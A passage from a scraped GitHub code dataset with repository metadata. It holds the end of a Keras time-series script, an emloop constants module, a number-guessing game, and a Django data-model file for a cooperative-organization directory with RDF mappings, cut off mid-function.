axs = plt.subplots(3, figsize=(10,5))\n fig.suptitle('Vertically stacked subplots')\n axs[0].plot(data_array[0,:], color = 'red')\n axs[1].plot(data_array[1,:], color = 'green')\n axs[2].plot(data_array[2,:], color = 'blue')\n plt.show()\n\ndef execute(filnam):\n predicted = 0\n tmp_array = np.load(filnam)\n data_array = tmp_array[0,:]\n stride = 4\n num_epochs = 1000\n number_of_features = 1\n number_of_data_points = len(data_array)\n number_of_chunks = (int)(number_of_data_points/stride)\n print('number_of_chunks: ', number_of_chunks)\n model, test_input = generate_model(data_array, number_of_data_points, number_of_chunks, number_of_features, num_epochs)\n prediction = naive_prediction_from_model(model, test_input, len(test_input), number_of_features)\n #plt.figure(1)\n #plt.plot(test_input)\n #plt.show()\n print(' test_input: ', test_input, flush=True)\n print(' max test_input: ', test_input.max(), flush=True)\n print(' min test_input: ', test_input.min(), flush=True)\n print(' prediction: ', prediction, flush=True)\n\nif __name__==\"__main__\":\n print(' Running ', flush=True)\n filnam = 'test.npy'\n execute(filnam)\n print(' Complete ', flush=True)","repo_name":"qjk5736/example_codes","sub_path":"python/keras_1d_cnn_time_series/keras_1D_time_series.py","file_name":"keras_1D_time_series.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"18259721458","text":"\"\"\"**emloop** module containing various constants.\"\"\"\n\nEL_LOG_FORMAT = '%(asctime)s.%(msecs)03d: %(levelname)-8s@%(module)-12s: %(message)s'\n\"\"\"General logging format.\"\"\"\n\nEL_LOG_DATE_FORMAT = '%Y-%m-%d %H:%M:%S'\n\"\"\"Date format used in logging.\"\"\"\n\nEL_FULL_DATE_FORMAT = '%Y-%m-%d %H:%M:%S.%f'\n\"\"\"Full date format.\"\"\"\n\nEL_HOOKS_MODULE = 'emloop.hooks'\n\"\"\"Module with standard emloop hooks (as would be used in import).\"\"\"\n\nEL_CONFIG_FILE = 'config.yaml'\n\"\"\"Configuration file name (dumped in the output directory).\"\"\"\n\nEL_DEFAULT_LOG_DIR = './log'\n\"\"\"Default log directory.\"\"\"\n\nEL_LOG_FILE = 'train.log'\n\"\"\"Log file (dumped in the output directory).\"\"\"\n\nEL_TRACE_FILE = 'trace.yaml'\n\"\"\"Training trace filename.\"\"\"\n\nEL_PREDICT_STREAM = 'predict'\n\"\"\"Predict stream name.\"\"\"\n\nEL_NA_STR = 'N/A'\n\"\"\"N/A string for pretty printing.\"\"\"\n\nEL_BUFFER_SLEEP = 0.02\n\"\"\"The duration for which the buffer sleeps before it starts to process the next batch.\"\"\"\n\nEL_DEFAULT_TRAIN_STREAM = 'train'\n\"\"\"The stream to be used for training.\"\"\"\n\n__all__ = ['EL_LOG_FORMAT', 'EL_LOG_DATE_FORMAT', 'EL_FULL_DATE_FORMAT', 'EL_HOOKS_MODULE', 'EL_CONFIG_FILE',\n 'EL_LOG_FILE', 'EL_TRACE_FILE', 'EL_DEFAULT_TRAIN_STREAM', 'EL_PREDICT_STREAM', 'EL_DEFAULT_LOG_DIR',\n 'EL_NA_STR', 'EL_BUFFER_SLEEP']\n","repo_name":"iterait/emloop","sub_path":"emloop/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"25941105104","text":"import random\r\n\r\ntop_of_range=input(\"Please choose top of range value: \")\r\n\r\nif top_of_range.isdigit():\r\n top_of_range=int(top_of_range)\r\n\r\nelse:\r\n print(\"Please enter a number next time\")\r\n quit()\r\n\r\nrandom_value=random.randint(0,top_of_range)\r\nguess=0\r\nprint(random_value)\r\n\r\nwhile True:\r\n guess+=1\r\n guess_value=input(\"Please guess a value in the range from 0 to \" + str(top_of_range) + \": \" )\r\n\r\n if guess_value.isdigit():\r\n guess_value=int(guess_value)\r\n\r\n else:\r\n print(\"Please enter a number next time\")\r\n continue\r\n\r\n if guess_value == random_value:\r\n print(\"You got it!\")\r\n print(\"You got it right in \" + str(guess) + \" guesses\") \r\n break\r\n elif guess_value>random_value:\r\n print(\"You were above the number\")\r\n else:\r\n print(\"You were below the number\")\r\n \r\n","repo_name":"VikVist/GitHub-Python","sub_path":"Guess_the_number.py","file_name":"Guess_the_number.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71399850081","text":"# -*- coding:utf-8 -*-\nfrom django.db import models\nfrom django.db.models import Count\nfrom autoslug import AutoSlugField\nfrom extended_choices import Choices\nfrom django_extensions.db import fields as exfields\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.exceptions import ValidationError\nfrom django.conf import settings\nfrom coop.models import URIModel\nfrom sorl.thumbnail import ImageField\nfrom sorl.thumbnail import default\nimport rdflib\nimport coop\nfrom django.contrib.sites.models import Site\nimport logging\nfrom urlparse import urlsplit\nimport simplejson\nfrom django.contrib.gis.db import models as geomodels\n\n\n#from mptt.models import MPTTModel, TreeForeignKey\n# class BaseClassification(MPTTModel, URIModel):\n# label = models.CharField(_(u'label'), max_length=60)\n# slug = AutoSlugField(populate_from='label', always_update=True, unique=True)\n# parent = TreeForeignKey('self', null=True, blank=True, related_name='children')\n# domain_name = 'thess.economie-solidaire.fr'\n\n# class MPTTMeta:\n# order_insertion_by = ['label']\n\n# class Meta:\n# abstract = True\n# verbose_name = _('Classification')\n# verbose_name_plural = _('Classifications')\n# ordering = ['tree_id', 'lft'] # for FeinCMS TreeEditor\n# app_label = fget'coop_local'\n\n# def __unicode__(self):\n# return unicode(self.label)\n\n# def get_absolute_url(self):\n# return reverse('%s-detail' % self._meta.object_name.lower(), args=[self.slug])\n\n# @property\n# def uri_id(self):\n# return self.slug\n\n# def uri_registry(self):\n# return u'label'\n\n\nclass BaseRoleCategory(models.Model):\n label = models.CharField(_(u'label'), max_length=60)\n slug = exfields.AutoSlugField(populate_from=('label'), overwrite=True)\n uri = models.CharField(_(u'URI'), blank=True, max_length=250)\n\n def save(self, *args, **kwargs):\n self.save_base()\n self.uri = u'http://thess.economie-solidaire.fr/id/role/%s/' % self.slug\n super(BaseRoleCategory, self).save(*args, **kwargs)\n\n class Meta:\n abstract = True\n ordering = ['label']\n verbose_name = _('Role category')\n verbose_name_plural = _('Role categories')\n #ordering = ['label']\n app_label = 'coop_local'\n\n def __unicode__(self):\n return unicode(self.label)\n\n\nclass BaseRole(URIModel):\n label = models.CharField(_(u'label'), max_length=120)\n slug = AutoSlugField(populate_from='label', always_update=True, unique=True, editable=False)\n category = models.ForeignKey('coop_local.RoleCategory', null=True, blank=True, verbose_name=_(u'category'))\n\n domain_name = 'thess.economie-solidaire.fr'\n\n class Meta:\n abstract = True\n verbose_name = _('Role')\n verbose_name_plural = _('Roles')\n #ordering = ['tree_id', 'lft'] # for FeinCMS TreeEditor\n #ordering = ['label']\n app_label = 'coop_local'\n\n @property\n def uri_id(self):\n return self.slug\n\n def uri_registry(self):\n return u'label'\n\n def __unicode__(self):\n return unicode(self.label)\n\n def get_absolute_url(self):\n return reverse('role_detail', args=[self.slug])\n\n # rdf stuff\n rdf_type = settings.NS.org.Role\n base_mapping = [\n ('single_mapping', (settings.NS.dct.created, 'created'), 'single_reverse'),\n ('single_mapping', (settings.NS.dct.modified, 'modified'), 'single_reverse'),\n ('single_mapping', (settings.NS.skos.prefLabel, 'label'), 'single_reverse'),\n\n # quand RoleCategory sera un URIModels on aura tout simpleùent\n #('single_mapping', (settings.NS.skos.broader, 'category'), 'single_reverse'),\n\n ('category_mapping', (settings.NS.skos.broader, 'category'), 'category_mapping_reverse'),\n ]\n\n def category_mapping(self, rdfPred, djF, lang=None):\n value = getattr(self, djF)\n if value == None:\n return []\n else:\n return [(rdflib.term.URIRef(self.uri), rdfPred, rdflib.term.URIRef(value.uri))]\n\n def category_mapping_reverse(self, g, rdfPred, djF, lang=None):\n values = list(g.objects(rdflib.term.URIRef(self), rdfPred))\n if values == []:\n setattr(self, djF, None)\n elif len(values) == 1:\n value = values[0]\n setattr(self, djF, models.get_model('coop_base', 'rolecategory').object.get(uri=value))\n\n\n# will apply to contact numbers and other things\n# TODO simplify it, see PPO Ontology\n\nDISPLAY = Choices(\n ('PUBLIC', 1, _(u'public information')),\n ('USERS', 2, _(u'registered members')),\n ('ADMIN', 3, _(u'administrators of this site')),\n)\n\nCOMM_MEANS = Choices(\n ('MAIL', 8, _(u'E-mail')),\n ('LAND', 1, _(u'Landline phone')),\n ('GSM', 2, _(u'Mobile phone')),\n ('FAX', 3, _(u'Fax')),\n ('WEB', 9, _(u'Secondary web site')),\n ('SKYPE', 4, _(u'Skype')),\n ('TWITTER', 5, _(u'Twitter')),\n ('RSS', 6, _(u'RSS Feed')),\n ('VCAL', 7, _(u'vCalendar')),\n)\n\n\nclass BaseContactMedium(models.Model): # this model will be initialized with a fixture\n label = models.CharField(_(u'label'), max_length=250)\n uri = models.CharField(_(u'URI'), blank=True, max_length=250)\n\n def __unicode__(self):\n return self.label\n\n class Meta:\n abstract = True\n verbose_name = _(u'Contact medium')\n verbose_name_plural = _(u'Contact mediums')\n app_label = 'coop_local'\n\n\nclass BaseContact(URIModel):\n \"\"\" A model which represents any communication medium (a phone number, an email) \"\"\"\n # category = models.PositiveSmallIntegerField(_(u'Category'),\n # choices=COMM_MEANS.CHOICES, editable=False, blank=True, null=True) # TODO erase when data migrated\n contact_medium = models.ForeignKey('coop_local.ContactMedium', verbose_name=u'medium')\n\n content = models.CharField(_(u'content'), max_length=250)\n details = models.CharField(_(u'details'), blank=True, max_length=100)\n display = models.PositiveSmallIntegerField(_(u'Display'),\n choices=DISPLAY.CHOICES, default=DISPLAY.ADMIN)\n\n content_type = models.ForeignKey(ContentType, blank=True, null=True)\n object_id = models.PositiveIntegerField()\n content_object = generic.GenericForeignKey('content_type', 'object_id')\n\n class Meta:\n abstract = True\n # ordering = ['contact_medium']\n verbose_name = _(u'Contact')\n verbose_name_plural = _(u'Contacts')\n app_label = 'coop_local'\n\n def __unicode__(self):\n if self.content_object != None and self.contact_medium_id != 8:\n return self.content + u' (' + self.content_object.__unicode__() + u')'\n else:\n return self.content\n\n def label(self):\n return self.__unicode__()\n\n @classmethod\n def clean_phone(cls, number):\n import re\n phoneSplitRegex = re.compile(r\"[\\-\\(\\) \\.\\,]\")\n parts = phoneSplitRegex.split(number)\n num = ''.join(parts)\n if len(num) == 10:\n cleaned_number = '.'.join((num[:2], num[2:4], num[4:6], num[6:8], num[8:]))\n return cleaned_number\n else:\n raise ValidationError(_(u'Phone numbers must have 10 digits'))\n\n def save(self, *args, **kwargs):\n if self.contact_medium_id in [1, 2, 3]:\n self.content = self.clean_phone(self.content)\n #logging.error(u'A contact has been created or modified', exc_info=True, extra={'request': request})\n super(BaseContact, self).save(*args, **kwargs)\n\n\n\n # RDF stuff\n def isOpenData(self):\n return self.display == DISPLAY.PUBLIC\n\n rdf_type = settings.NS.ess.ContactMedium\n\n base_mapping = [\n ('single_mapping', (settings.NS.dct.created, 'created'), 'single_reverse'),\n ('single_mapping', (settings.NS.dct.modified, 'modified'), 'single_reverse'),\n ('single_mapping', (settings.NS.rdf.value, 'content'), 'single_reverse'),\n ('single_mapping', (settings.NS.rdfs.comment, 'details'), 'single_reverse'),\n\n ('medium_mapping', (settings.NS.rdf.type, 'contact_medium'), 'medium_mapping_reverse'),\n ]\n\n\n def medium_mapping(self, rdfPred, djF, lang=None):\n medium = getattr(self, djF)\n rdfSubject = rdflib.URIRef(self.uri)\n return [(rdfSubject, rdfPred, rdflib.URIRef(medium.uri))]\n\n\n def medium_mapping_reverse(self, g, rdfPred, djF, lang=None):\n values = list(g.objects(rdflib.term.URIRef(self.uri), rdfPred)) \n values.remove(self.rdf_type)\n m = models.get_model('coop_local', 'contactmedium')\n if len(values) == 1:\n value = values[0]\n medium = m.objects.get(uri=str(value))\n setattr(self, djF, medium)\n\n\n# TODO : use django-multilingual-ng to translate the label field in multiple languages\n\nclass BaseOrgRelationType(models.Model): # this model will be initialized with a fixture\n label = models.CharField(_(u'label'), max_length=250)\n uri = models.CharField(_(u'URI'), blank=True, max_length=250)\n key_name = models.CharField(_(u'key name'), max_length=250, blank=True)\n org_to_org = models.BooleanField(_('available for org-to-org relations'), default=True)\n org_to_project = models.BooleanField(_('available for org-to-project relations'), default=True)\n\n def __unicode__(self):\n return self.label\n\n class Meta:\n abstract = True\n verbose_name = _(u'Organizations relation type')\n verbose_name_plural = _(u'Organization relations types')\n app_label = 'coop_local'\n\n\nRELATIONS = Choices(\n ('MEMBER', 1, _(u' is member of ')),\n ('REG_SUPPLIER', 2, _(u' has for regular supplier ')),\n ('OCC_SUPPLIER', 3, _(u' has for casual supplier ')),\n ('SUPPORT', 4, _(u' received technical support from ')),\n ('FUNDING', 5, _(u' received financial support from ')),\n)\n\n\nclass BaseRelation(models.Model):\n source = models.ForeignKey('coop_local.Organization', verbose_name=_(u'source organization'), related_name='source')\n target = models.ForeignKey('coop_local.Organization', verbose_name=_(u'target organization'), related_name='target')\n reltype = models.PositiveSmallIntegerField(_(u'Relation type'), choices=RELATIONS.CHOICES, blank=True, null=True) # TODO erase when data migrated AND remove\n relation_type = models.ForeignKey('coop_local.OrgRelationType',\n verbose_name=_(u'relation type'),\n null=True, blank=True)\n\n created = exfields.CreationDateTimeField(_(u'created'), null=True)\n modified = exfields.ModificationDateTimeField(_(u'modified'), null=True)\n #confirmed = models.BooleanField(default=False, verbose_name=_(u'confirmed by the target organization'))\n\n class Meta:\n abstract = True\n verbose_name = _('Relation')\n verbose_name_plural = _('Relations')\n app_label = 'coop_local'\n\n def __unicode__(self):\n return _(u\"Relation : %(a)s is a %(r)s of %(b)s\") % {'a': self.source.__unicode__(),\n 'r': self.relation_type.__unicode__(),\n 'b': self.target.__unicode__()}\n '''\n # TODO\n def save(self):\n vérifier si la relation inverse existe\n '''\n\n\nclass BaseEngagement(URIModel):\n person = models.ForeignKey('coop_local.Person', verbose_name=_(u'person'), related_name='engagements')\n organization = models.ForeignKey('coop_local.Organization', verbose_name=_(u'organization'))\n role = models.ForeignKey('coop_local.Role', verbose_name=_(u'role'), null=True, blank=True)\n role_detail = models.CharField(_(u'detailed role'), blank=True, max_length=100)\n org_admin = models.BooleanField(_(u'has editor rights'), default=True)\n engagement_display = models.PositiveSmallIntegerField(_(u'Display'), choices=DISPLAY.CHOICES, default=DISPLAY.PUBLIC)\n\n remote_person_uri = models.URLField(_(u'remote person URI'), blank=True, null=True, max_length=255, editable=False)\n remote_person_label = models.CharField(_(u'remote person label'),\n max_length=250, blank=True, null=True,\n help_text=_(u'fill this only if the person record is not available locally'))\n\n remote_role_uri = models.URLField(_(u'URI'), blank=True, null=True, max_length=250)\n remote_role_label = models.CharField(blank=True, null=True, max_length=100)\n\n remote_organization_uri = models.URLField(_(u'remote organization URI'), blank=True, null=True, max_length=255, editable=False)\n remote_organization_label = models.CharField(_(u'remote organization label'),\n max_length=250, blank=True, null=True,\n help_text=_(u'fill this only if the organization record is not available locally'))\n\n\n\n class Meta:\n abstract = True\n verbose_name = _('Engagement')\n verbose_name_plural = _('Engagements')\n app_label = 'coop_local'\n\n def __unicode__(self):\n if self.role:\n return '%(person)s, %(role)s @ %(org)s' % {\n 'person': self.person.__unicode__(),\n 'role': self.role.__unicode__(),\n 'org': self.organization.__unicode__()\n }\n else:\n return '%(person)s, %(role)s @ %(org)s' % {\n 'person': self.person.__unicode__(),\n 'role': self.remote_role_label if self.remote_role_label else '',\n 'org': self.organization.__unicode__()\n }\n\n def label(self):\n return self.__unicode__()\n\n # RDF stufs\n def isOpenData(self):\n return self.engagement_display == DISPLAY.PUBLIC\n\n rdf_type = settings.NS.org.Membership\n base_mapping = [\n ('single_mapping', (settings.NS.dct.created, 'created'), 'single_reverse'),\n ('single_mapping', (settings.NS.dct.modified, 'modified'), 'single_reverse'),\n ('single_mapping', (settings.NS.org.member, 'person'), 'single_reverse'),\n\n ('local_or_remote_mapping', (settings.NS.org.organization, 'organization'), 'local_or_remote_reverse'),\n ('local_or_remote_mapping', (settings.NS.org.role, 'role'), 'local_or_remote_reverse'),\n\n ('label_mapping', (settings.NS.rdfs.label, 'id', 'fr'), 'label_mapping_reverse'),\n\n ]\n\n def label_mapping(self, rdfPred, djF, lang):\n return [(rdflib.term.URIRef(self.uri), rdfPred, rdflib.term.Literal(u'Engagement n°%s' % self.id, lang))]\n\n def label_mapping_reverse(self, g, rdfPred, djF, lang=None):\n pass\n\n\nclass BaseOrganizationCategory(models.Model):\n label = models.CharField(blank=True, max_length=100)\n slug = exfields.AutoSlugField(populate_from=('label'), overwrite=True)\n description = models.TextField(_(u'description'), blank=True)\n\n class Meta:\n abstract = True\n verbose_name = _(u'organization category')\n verbose_name_plural = _(u'organization categories')\n app_label = 'coop_local'\n\n def __unicode__(self):\n return self.label\n\n #@models.permalink\n def get_absolute_url(self):\n return reverse('org_category_detail', args=[self.slug])\n\n def get_edit_url(self):\n return reverse('org_category_edit', args=[self.slug])\n\n def get_cancel_url(self):\n return reverse('org_category_edit_cancel', args=[self.slug])\n\n def _can_modify_organizationcategory(self, user):\n if user.is_authenticated():\n if user.is_superuser:\n return True\n else:\n return False\n\n def can_view_organizationcategory(self, user):\n # TODO use global privacy permissions on objects\n return True\n\n def can_edit_organizationcategory(self, user):\n return self._can_modify_organizationcategory(user)\n\n\n\n\n\n\n\nPREFLABEL = Choices(\n ('TITLE', 1, _(u'title')),\n ('ACRO', 2, _(u'acronym')),\n)\n\n\ndef get_logo_folder(self, filename):\n img_root = 'org_logos'\n return u'{0}/{1}/{2}'.format(img_root, self.id, filename)\n\n\nclass BaseOrganization(URIModel):\n title = models.CharField(_(u'title'), max_length=250)\n\n acronym = models.CharField(_(u'acronym'), max_length=100, blank=True, null=True)\n pref_label = models.PositiveSmallIntegerField(_(u'Preferred label'),\n choices=PREFLABEL.CHOICES,\n default=PREFLABEL.TITLE)\n\n subtitle = models.CharField(_(u'tagline'), blank=True, null=True,\n max_length=250,\n help_text=_(u'tell us what your organization do in one line.'))\n\n description = models.TextField(_(u'description'), blank=True, null=True)\n\n logo = ImageField(upload_to='logos/', null=True, blank=True)\n #temp_logo = models.ImageField(upload_to=get_logo_folder, blank=True, null=True, default='')\n\n relations = models.ManyToManyField('coop_local.Organization',\n symmetrical=False, through='coop_local.Relation',\n verbose_name=_(u'relations'))\n\n category = models.ManyToManyField('coop_local.OrganizationCategory',\n blank=True, null=True, verbose_name=_(u'category'))\n\n members = models.ManyToManyField('coop_local.Person',\n through='coop_local.Engagement',\n verbose_name=_(u'members'))\n\n contacts = generic.GenericRelation('coop_local.Contact')\n\n if 'coop.mailing' in settings.INSTALLED_APPS:\n subs = generic.GenericRelation('coop_local.Subscription')\n newsletter = models.ForeignKey('coop_local.Newsletter', verbose_name=u'newsletter',\n blank=True, null=True, related_name='news_organization',\n on_delete=models.SET_NULL)\n\n\n # ORDER : coop_geo must be loaded BEFORE coop_local\n if \"coop_geo\" in settings.INSTALLED_APPS:\n located = generic.GenericRelation('coop_geo.Located') # , related_name='located_org')\n framed = generic.GenericRelation('coop_geo.AreaLink') # , related_name='framed_org')\n\n birth = models.DateField(_(u'creation date'), null=True, blank=True)\n email = models.EmailField(_(u'global email'), blank=True, null=True)\n email_sha1 = models.CharField(_(u'email checksum'),\n max_length=250, blank=True, null=True) # TODO : do this in Postgre\n web = models.URLField(_(u'web site'), blank=True, null=True)\n\n pref_email = models.ForeignKey('coop_local.Contact',\n verbose_name=_(u'preferred email'),\n related_name=\"pref_email\", null=True, blank=True,\n on_delete=models.SET_NULL)\n pref_phone = models.ForeignKey('coop_local.Contact',\n verbose_name=_(u'preferred phone'),\n related_name='pref_phone', null=True, blank=True,\n on_delete=models.SET_NULL)\n pref_address = models.ForeignKey('coop_local.Location',\n verbose_name=_(u'preferred postal address'),\n related_name='pref_address_org',\n null=True, blank=True,\n on_delete=models.SET_NULL)\n\n slug = exfields.AutoSlugField(populate_from='title', blank=True, overwrite=True)\n notes = models.TextField(_(u'notes'), blank=True)\n\n if \"coop.agenda\" in settings.INSTALLED_APPS:\n dated = generic.GenericRelation('coop_local.Dated')\n\n if \"coop.doc\" in settings.INSTALLED_APPS:\n attachments = generic.GenericRelation('coop_local.Attachment')\n\n external_links = generic.GenericRelation('coop_local.Link')\n mailing = models.BooleanField(_(u'receives mailing'), default=True)\n\n\n class Meta:\n abstract = True\n ordering = ['title']\n verbose_name = _(u'Organization')\n verbose_name_plural = _(u'Organizations')\n app_label = 'coop_local'\n\n def __unicode__(self):\n return unicode(self.title)\n\n def label(self):\n if self.pref_label == PREFLABEL.TITLE:\n return self.title\n elif self.pref_label == PREFLABEL.ACRO:\n return self.acronym\n\n if \"coop_geo\" in settings.INSTALLED_APPS:\n\n geom_manager = geomodels.GeoManager()\n\n def has_location(self):\n return self.located.all().count() > 0\n has_location.boolean = True\n has_location.short_description = _(u'geo')\n\n def locations(self):\n from coop_local.models import Location\n return Location.objects.filter(id__in=self.located.all().values_list('location_id', flat=True))\n\n def areas(self):\n from coop_local.models import Area\n return Area.objects.filter(id__in=self.framed.all().values_list('location_id', flat=True))\n\n def pref_geoJson(self):\n if self.pref_address and self.pref_address.point:\n json = self.pref_address.geoJson()\n json[\"properties\"][\"label\"] = self.label().encode(\"utf-8\")\n json[\"properties\"][\"category\"] = [c.slug.encode('utf-8') for c in self.category.all()]\n json[\"properties\"][\"popupContent\"] = u\"<p><a href='\" + \\\n self.get_absolute_url() + u\"'>\" + self.label() + u\"</a></p>\"\n return [json]\n else:\n return []\n\n # def pref_geoJson(self):\n # if self.pref_address:\n # json = self.pref_address.geoJson()\n # if json:\n # json[\"properties\"][\"label\"] = self.label().encode(\"utf-8\")\n # json[\"properties\"][\"organization\"] = self.organization.label().encode('utf-8')\n # json[\"properties\"][\"category\"] = [c.slug.encode('utf-8') for c in self.category.all()]\n # json[\"properties\"][\"popupContent\"] = u\"<p><a href='\" + \\\n # self.get_absolute_url() + u\"'>\" + self.label() + u\"</a></p>\"\n # return[json]\n # else:\n # return []\n # else:\n # return []\n\n\n\n\n def locations_geoJson(self):\n res = self.pref_geoJson()\n other_locations = set(self.locations()).difference(set([self.pref_address]))\n for loc in other_locations:\n located = self.located.get(location=loc)\n json = located.geoJson()\n json[\"properties\"][\"label\"] = self.label().encode(\"utf-8\")\n res.append(json)\n return res\n\n def areas_geoJson(self):\n res = []\n for al in self.framed.all():\n res.append(al.geoJson())\n return res\n\n def all_geoJson(self):\n res = self.locations_geoJson()\n res.extend(self.areas_geoJson())\n return res\n\n def has_description(self):\n return self.description and len(self.description) > 20\n \n has_description.boolean = True\n has_description.short_description = _(u'desc.')\n\n def logo_list_display(self):\n try:\n if self.logo:\n thumb = default.backend.get_thumbnail(self.logo.file, settings.ADMIN_THUMBS_SIZE)\n return '<img width=\"%s\" src=\"%s\" />' % (thumb.width, thumb.url)\n else:\n return _(u\"No Image\")\n except IOError:\n return _(u\"No Image\")\n\n logo_list_display.short_description = _(u\"logo\")\n logo_list_display.allow_tags = True\n\n #@models.permalink\n def get_absolute_url(self):\n return reverse('org_detail', args=[self.slug])\n\n def get_admin_url(self):\n return reverse('admin:coop_local_organization_change', args=[self.id])\n\n def get_relations(self):\n relations = {}\n # relmap = RELATIONS.REVERTED_CHOICES_CONST_DICT\n\n for rel in self.source.all():\n reltype = str('OUT_' + rel.relation_type.key_name) # me => others\n relations[reltype] = []\n relations[reltype].append(rel.target)\n for rel in self.target.all():\n reltype = str('IN_' + rel.relation_type.key_name) # others said this\n if reltype not in relations:\n relations[reltype] = []\n #if rel.confirmed: # which one are confirmed by both parts\n relations[reltype].append(rel.source)\n return relations\n\n # def local_uri(self):\n # return ('http://dev.credis.org:8000/org/' + self.slug + '/')\n\n def main_location(self):\n if self.located.all().exists():\n return self.located.all()[0].location\n else:\n return None\n\n\n\n def save(self, *args, **kwargs):\n # Set default values for preferred email, phone and postal address\n # if not self.pref_phone : # bizarre ici il FAUT faire == None et pour pref_mail c'est if not...\n # phone_categories = [1, 2]\n # fixes = self.contacts.filter(contact_medium_id__in=phone_categories)\n # if fixes.exists():\n # self.pref_phone = fixes[0]\n\n # if not self.pref_email:\n # orgmails = self.contacts.filter(contact_medium_id=8)\n # if orgmails.exists():\n # self.pref_email = orgmails[0]\n # else:\n # self.pref_email = self.members.all()[0].pref_email\n \n\n if 'coop_geo' in settings.INSTALLED_APPS:\n if self.pref_address == None:\n locations = self.located.all() # should we have a \"main venue\" ?\n if locations.count() > 0:\n self.pref_address = locations[0].location\n\n # TODO move this to Contact model or do it in SQL\n\n # if self.email and self.email != '':\n # import hashlib\n # m = hashlib.sha1()\n # m.update(self.email)\n # self.email_sha1 = m.hexdigest()\n super(BaseOrganization, self).save(*args, **kwargs)\n\n def get_edit_url(self):\n return reverse('org_edit', args=[self.slug])\n\n def get_cancel_url(self):\n return reverse('org_edit_cancel', args=[self.slug])\n\n def _can_modify_organization(self, user):\n if user.is_authenticated():\n if user.is_superuser:\n return True\n elif user.person in self.members.all():\n return True\n else:\n return False\n\n def can_view_organization(self, user):\n # TODO use global privacy permissions on objects\n return True\n\n def can_edit_organization(self, user):\n return self._can_modify_organization(user)\n\n rdf_type = settings.NS.org.Organization\n\n def isOpenData(self):\n return self.active\n\n base_mapping = [\n ('single_mapping', (settings.NS.dct.created, 'birth'), 'single_reverse'),\n ('single_mapping', (settings.NS.dct.modified, 'modified'), 'single_reverse'),\n ('single_mapping', (settings.NS.legal.legalName, 'title'), 'single_reverse'),\n ('single_mapping', (settings.NS.ov.prefAcronym, 'acronym'), 'single_reverse'),\n ('single_mapping', (settings.NS.rdfs.comment, 'subtitle'), 'single_reverse'),\n ('single_mapping', (settings.NS.dct.description, 'description'), 'single_reverse'),\n ('single_mapping', (settings.NS.foaf.mbox_sha1sum, 'email_sha1'), 'single_reverse'),\n ('single_mapping', (settings.NS.foaf.homepage, 'web'), 'single_reverse'),\n ('single_mapping', (settings.NS.foaf.birthday, 'birth'), 'single_reverse'),\n ('single_mapping', (settings.NS.vcard.tel, 'pref_phone'), 'single_reverse'),\n ('single_mapping', (settings.NS.vcard.mail, 'pref_email'), 'single_reverse'),\n ('single_mapping', (settings.NS.legal.registeredAddress, 'pref_address'), 'single_reverse'),\n ('single_mapping', (settings.NS.skos.note, 'notes'), 'single_reverse'),\n\n ('multi_mapping', (settings.NS.dct.subject, 'tags'), 'multi_reverse'), \n # FIXME : Organization objects need to have a primary key value before you can access their tags.\n\n ('multi_mapping', (settings.NS.ess.hasContactMedium, 'contacts'), 'multi_reverse'),\n # FIXME : 'Contact' instance expected\n\n ('multi_mapping', (settings.NS.org.hasMember, 'members'), 'none_reverse'),\n # FIXME : 'Organization' instance needs to have a primary key value before a many-to-many relationship can be used.\n\n\n ('logo_mapping', (settings.NS.foaf.logo, 'logo'), 'logo_mapping_reverse'),\n ('prefLabel_mapping', (settings.NS.rdfs.label, 'pref_label'), 'prefLabel_mapping_reverse'),\n \n ('location_mapping', (settings.NS.locn.location, 'located'), 'location_mapping_reverse'),\n # FIXME : Located matching query does not exist.\n\n ('location_mapping', (settings.NS.ess.actionArea, 'framed'), 'location_mapping_reverse'),\n ('exchange_mapping', (settings.NS.gr.offers, settings.NS.gr.seeks), 'exchange_mapping_reverse'),\n ('engagement_mapping', (settings.NS.org.organization, 'engagement_set'), 'engagement_mapping_reverse'),\n\n ]\n\n\n # We to add in the graph the coresponding Engagement\n def engagement_mapping(self, rdfPred, djF):\n res = []\n for e in getattr(self, djF).all():\n res.append((rdflib.term.URIRef(e.uri), rdfPred, rdflib.term.URIRef(self.uri)))\n return res\n\n def engagement_mapping_reverse(self, g, rdfPred, djF):\n pass\n\n def location_mapping(self, rdfPred, djF):\n values = map(lambda x: x.location, getattr(self, djF).all())\n return self.multi_mapping_base(values, rdfPred)\n\n def location_mapping_reverse(self, g, rdfPred, djField, lang=None):\n rdf_values = set(g.objects(rdflib.term.URIRef(self.uri), rdfPred))\n # Values contient des instances de Location. \n # Il faut remonter soit a des Located soit a des AreaLink\n values = map(coop.models.StaticURIModel.toDjango, rdf_values)\n if djField == 'located':\n m = models.get_model('coop_geo', 'located')\n try:\n values = set(map(lambda x: m.objects.get(object_id=self.id, location=x), values))\n except m.DoesNotExist:\n values = set([])\n elif djField == 'framed':\n m = models.get_model('coop_geo', 'arealink')\n try:\n values = set(map(lambda x: m.objects.get(object_id=self.id, location=x), values))\n except m.DoesNotExist:\n values = set([])\n manager = getattr(self, djField)\n old_values = set(manager.all())\n remove = old_values.difference(values)\n add = values.difference(old_values)\n for v in remove:\n manager.remove(v)\n for v in add:\n manager.add(v)\n\n def logo_mapping(self, rdfPred, djF):\n logo = getattr(self, djF)\n if logo == None:\n return []\n else:\n try:\n rdfSubject = rdflib.term.URIRef(self.uri)\n rdfValue = rdflib.term.URIRef('http://' + str(Site.objects.get_current().domain) + logo.url)\n return [(rdfSubject, rdfPred, rdfValue)]\n except ValueError:\n return []\n\n # TODO : télécharger le logo dans un dossier /tmp et le passer à sorl.thumbnail pour traitement\n def logo_mapping_reverse(self, g, rdfPred, djF):\n value = list(g.objects(rdflib.term.URIRef(self.uri), rdfPred))\n if len(value) == 1:\n value = value[0].toPython()\n scheme, host, path, query, fragment = urlsplit(value)\n sp = path.split('/')\n setattr(self, djF, \"%s:%s\" % (sp[len(sp) - 2], sp[len(sp) - 1]))\n else:\n pass\n\n def prefLabel_mapping(self, rdfPred, djF, lang=None):\n label = self.label()\n if label == None:\n return []\n else:\n subject_args = {}\n if lang:\n subject_args['lang'] = 